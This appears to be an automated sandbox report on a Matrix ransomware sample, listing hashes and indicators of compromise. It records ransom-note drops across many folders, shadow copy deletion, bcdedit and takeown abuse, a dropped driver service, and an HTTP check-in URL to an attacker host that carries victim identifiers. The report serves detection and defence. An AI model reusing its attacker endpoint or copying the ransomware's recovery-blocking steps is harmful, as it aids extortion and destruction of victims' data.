Analysis
-
max time kernel
94s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
28-12-2022 18:35
Static task
static1
Behavioral task
behavioral1
Sample
67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
Resource
win10v2004-20220812-en
General
-
Target
67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
-
Size
1.2MB
-
MD5
c50c17057fc6ea67bc579196f1f73712
-
SHA1
44495db58fa7c94db840a3f696c8f546a5fce2d1
-
SHA256
67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a
-
SHA512
7c5eb6317b0a51ae93302adb223d6163a5c771d5b1d8d77462c2463c37f32e0f7f957526a36e39ae5272687e4ebe2faf2d02e68601bc87afc95fc9d7145538aa
-
SSDEEP
24576:pxsxl/OOeI7RC4CJR5ez+IlnRJE5rABxPJhPPT/q:8fjRERAhPPzq
Malware Config
Extracted
http://myexternalip.com/raw
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description flow ioc Process File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310091\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Users\All Users\Microsoft\Diagnosis\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files\Microsoft Office 15\ClientX64\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\nl\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\be\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ha-Latn-NG\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pa-Arab-PK\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files\Google\Chrome\Application\89.0.4389.114\default_apps\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files\Google\Chrome\Application\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\js\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\Settings\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mt-MT\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wvpppa2c.Admin\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0fx48ci0.default-release\storage\default\moz-extension+++08d35b16-270d-4ee9-b076-44e94a1b4f9d^userContextId=4294967295\idb\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\etc\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\lib\locale\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\ProgramData\Package Cache\{61087a79-ac85-455c-934d-1fa22cc64f36}\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\ProgramData\Package Cache\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}v14.30.30704\packages\vcRuntimeAdditional_amd64\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nl\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Users\Admin\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pt-PT\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Users\Public\Libraries\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sq\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\Settings\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\es\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sr-Cyrl-RS\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe HTTP URL 5 http://jostat.mygoodsday.org/addrecord.php?apikey=kok08_api_key&compuser=GBQHURCC|Admin&sid=dMYzDrTBvyyXT9qX&phase=START Process not Found File created C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fil-PH\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0fx48ci0.default-release\datareporting\archived\2022-08\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\B11EF506-7DE1-455F-8E20-67264DD4AF60\x-none.16\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Users\Admin\AppData\Local\Adobe\Color\Profiles\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ga-IE\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files\VideoLAN\VLC\skins\fonts\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\ProgramData\regid.1991-06.com.microsoft\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bn-IN\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files\Mozilla Firefox\fonts\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files (x86)\Windows Photo Viewer\fr-FR\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Users\Admin\Contacts\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files\Java\jdk1.8.0_66\db\lib\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\lv\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nso-ZA\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files (x86)\Windows Photo Viewer\ja-JP\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files\Java\jdk1.8.0_66\include\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 4124 bcdedit.exe 3004 bcdedit.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 11 4184 powershell.exe 16 2476 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS hbFC3HC764.exe -
Executes dropped EXE 64 IoCs
pid Process 4148 NWujmQJJ.exe 4540 hbFC3HC7.exe 4564 hbFC3HC764.exe 2496 hbFC3HC7.exe 2332 hbFC3HC7.exe 3664 hbFC3HC7.exe 4012 hbFC3HC7.exe 4252 hbFC3HC7.exe 4072 hbFC3HC7.exe 4448 hbFC3HC7.exe 1952 hbFC3HC7.exe 3592 hbFC3HC7.exe 4092 hbFC3HC7.exe 1808 hbFC3HC7.exe 4764 hbFC3HC7.exe 776 hbFC3HC7.exe 5000 hbFC3HC7.exe 2832 hbFC3HC7.exe 676 hbFC3HC7.exe 4404 hbFC3HC7.exe 4848 hbFC3HC7.exe 4468 hbFC3HC7.exe 3416 hbFC3HC7.exe 3948 hbFC3HC7.exe 2560 hbFC3HC7.exe 1116 hbFC3HC7.exe 548 hbFC3HC7.exe 4888 hbFC3HC7.exe 4856 hbFC3HC7.exe 4876 hbFC3HC7.exe 2748 hbFC3HC7.exe 4764 hbFC3HC7.exe 3900 hbFC3HC7.exe 4380 hbFC3HC7.exe 5024 hbFC3HC7.exe 1232 hbFC3HC7.exe 2088 hbFC3HC7.exe 2584 hbFC3HC7.exe 2396 hbFC3HC7.exe 1608 hbFC3HC7.exe 1408 hbFC3HC7.exe 4476 hbFC3HC7.exe 4104 hbFC3HC7.exe 4280 hbFC3HC7.exe 3952 hbFC3HC7.exe 4472 hbFC3HC7.exe 1860 hbFC3HC7.exe 3208 hbFC3HC7.exe 2432 hbFC3HC7.exe 2744 hbFC3HC7.exe 4148 hbFC3HC7.exe 2476 hbFC3HC7.exe 4708 hbFC3HC7.exe 4996 hbFC3HC7.exe 428 hbFC3HC7.exe 304 hbFC3HC7.exe 3068 hbFC3HC7.exe 332 hbFC3HC7.exe 3772 hbFC3HC7.exe 4396 hbFC3HC7.exe 4228 hbFC3HC7.exe 1800 hbFC3HC7.exe 4736 hbFC3HC7.exe 4988 hbFC3HC7.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" hbFC3HC764.exe -
resource yara_rule behavioral2/files/0x0006000000022e5c-165.dat upx behavioral2/files/0x0006000000022e5c-166.dat upx behavioral2/memory/4540-171-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/files/0x0006000000022e5c-182.dat upx behavioral2/memory/2496-183-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/files/0x0006000000022e5c-185.dat upx behavioral2/memory/2332-186-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/files/0x0006000000022e5c-192.dat upx behavioral2/memory/3664-193-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/files/0x0006000000022e5c-195.dat upx behavioral2/memory/4012-196-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/files/0x0006000000022e5c-203.dat upx behavioral2/memory/4252-204-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/files/0x0006000000022e5c-206.dat upx behavioral2/memory/4072-207-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/files/0x0006000000022e5c-213.dat upx behavioral2/memory/4448-214-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/files/0x0006000000022e5c-216.dat upx behavioral2/memory/1952-217-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/memory/1952-218-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/files/0x0006000000022e5c-224.dat upx behavioral2/memory/3592-225-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/files/0x0006000000022e5c-227.dat upx behavioral2/memory/4092-228-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/files/0x0006000000022e5c-234.dat upx behavioral2/memory/1808-235-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/files/0x0006000000022e5c-237.dat upx behavioral2/memory/4764-238-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/files/0x0006000000022e5c-244.dat upx behavioral2/memory/776-245-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/files/0x0006000000022e5c-246.dat upx behavioral2/memory/5000-247-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/files/0x0006000000022e5c-248.dat upx behavioral2/memory/2832-249-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/files/0x0006000000022e5c-250.dat upx behavioral2/memory/676-251-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/files/0x0006000000022e5c-252.dat upx behavioral2/memory/4404-253-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/files/0x0006000000022e5c-254.dat upx behavioral2/memory/4848-255-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/files/0x0006000000022e5c-256.dat upx behavioral2/memory/4468-257-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/files/0x0006000000022e5c-258.dat upx behavioral2/memory/3416-259-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/files/0x0006000000022e5c-260.dat upx behavioral2/memory/3948-261-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/files/0x0006000000022e5c-262.dat upx behavioral2/memory/2560-263-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/files/0x0006000000022e5c-264.dat upx behavioral2/memory/1116-265-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/files/0x0006000000022e5c-266.dat upx behavioral2/memory/548-267-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/files/0x0006000000022e5c-268.dat upx behavioral2/memory/4888-269-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/files/0x0006000000022e5c-270.dat upx behavioral2/memory/4856-271-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/files/0x0006000000022e5c-272.dat upx behavioral2/memory/4876-273-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/files/0x0006000000022e5c-274.dat upx behavioral2/memory/2748-275-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/files/0x0006000000022e5c-276.dat upx behavioral2/memory/4764-277-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/files/0x0006000000022e5c-278.dat upx behavioral2/memory/3900-279-0x0000000000400000-0x0000000000477000-memory.dmp upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation wscript.exe -
Modifies file permissions 1 TTPs 64 IoCs
pid Process 4868 takeown.exe 4316 takeown.exe 4736 takeown.exe 4576 takeown.exe 304 takeown.exe 1556 takeown.exe 2232 takeown.exe 1156 takeown.exe 2232 takeown.exe 3168 takeown.exe 4804 takeown.exe 4480 takeown.exe 2812 takeown.exe 4124 takeown.exe 4672 takeown.exe 2820 takeown.exe 2212 takeown.exe 2664 takeown.exe 1036 takeown.exe 2288 takeown.exe 3752 takeown.exe 1032 takeown.exe 3620 takeown.exe 3768 takeown.exe 4684 takeown.exe 4244 takeown.exe 3896 takeown.exe 4716 takeown.exe 4952 takeown.exe 3504 takeown.exe 4828 takeown.exe 3744 takeown.exe 1916 takeown.exe 3952 takeown.exe 4228 takeown.exe 2980 takeown.exe 2424 takeown.exe 4840 takeown.exe 4756 takeown.exe 4584 takeown.exe 3504 takeown.exe 5000 takeown.exe 4720 takeown.exe 3768 takeown.exe 4924 takeown.exe 3328 takeown.exe 4268 takeown.exe 4924 takeown.exe 1428 takeown.exe 4016 takeown.exe 2396 takeown.exe 472 takeown.exe 2328 takeown.exe 3540 takeown.exe 2692 takeown.exe 3504 takeown.exe 4972 takeown.exe 4228 takeown.exe 1668 takeown.exe 280 takeown.exe 740 takeown.exe 3944 takeown.exe 1172 takeown.exe 2952 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 27 IoCs
description ioc Process File opened for modification C:\Users\Public\Pictures\desktop.ini 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Users\Public\Music\desktop.ini 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Users\Public\Documents\desktop.ini 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Users\Public\desktop.ini 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Users\Admin\Music\desktop.ini 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Users\Public\Downloads\desktop.ini 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Users\Admin\Links\desktop.ini 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Users\Public\Desktop\desktop.ini 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\desktop.ini 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files (x86)\desktop.ini 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Users\Public\Videos\desktop.ini 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Users\Admin\Searches\desktop.ini 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Users\Admin\Documents\desktop.ini 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Users\Admin\Videos\desktop.ini 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Users\Public\Libraries\desktop.ini 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\T: hbFC3HC764.exe File opened (read-only) \??\U: hbFC3HC764.exe File opened (read-only) \??\W: hbFC3HC764.exe File opened (read-only) \??\A: hbFC3HC764.exe File opened (read-only) \??\M: hbFC3HC764.exe File opened (read-only) \??\R: 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened (read-only) \??\H: hbFC3HC764.exe File opened (read-only) \??\Z: hbFC3HC764.exe File opened (read-only) \??\Z: 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened (read-only) \??\U: 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened (read-only) \??\I: 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened (read-only) \??\F: 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened (read-only) \??\G: hbFC3HC764.exe File opened (read-only) \??\K: hbFC3HC764.exe File opened (read-only) \??\R: hbFC3HC764.exe File opened (read-only) \??\S: hbFC3HC764.exe File opened (read-only) \??\Y: 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened (read-only) \??\X: 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened (read-only) \??\X: hbFC3HC764.exe File opened (read-only) \??\Y: hbFC3HC764.exe File opened (read-only) \??\O: hbFC3HC764.exe File opened (read-only) \??\K: 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened (read-only) \??\F: hbFC3HC764.exe File opened (read-only) \??\L: 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened (read-only) \??\H: 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened (read-only) \??\S: 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened (read-only) \??\N: 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened (read-only) \??\M: 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened (read-only) \??\G: 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened (read-only) \??\E: 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened (read-only) \??\B: hbFC3HC764.exe File opened (read-only) \??\E: hbFC3HC764.exe File opened (read-only) \??\I: hbFC3HC764.exe File opened (read-only) \??\W: 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened (read-only) \??\Q: 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened (read-only) \??\V: hbFC3HC764.exe File opened (read-only) \??\L: hbFC3HC764.exe File opened (read-only) \??\P: hbFC3HC764.exe File opened (read-only) \??\P: 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened (read-only) \??\O: 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened (read-only) \??\J: hbFC3HC764.exe File opened (read-only) \??\V: 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened (read-only) \??\T: 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened (read-only) \??\Q: hbFC3HC764.exe File opened (read-only) \??\J: 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened (read-only) \??\N: hbFC3HC764.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 10 myexternalip.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\YnGIlPbI.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
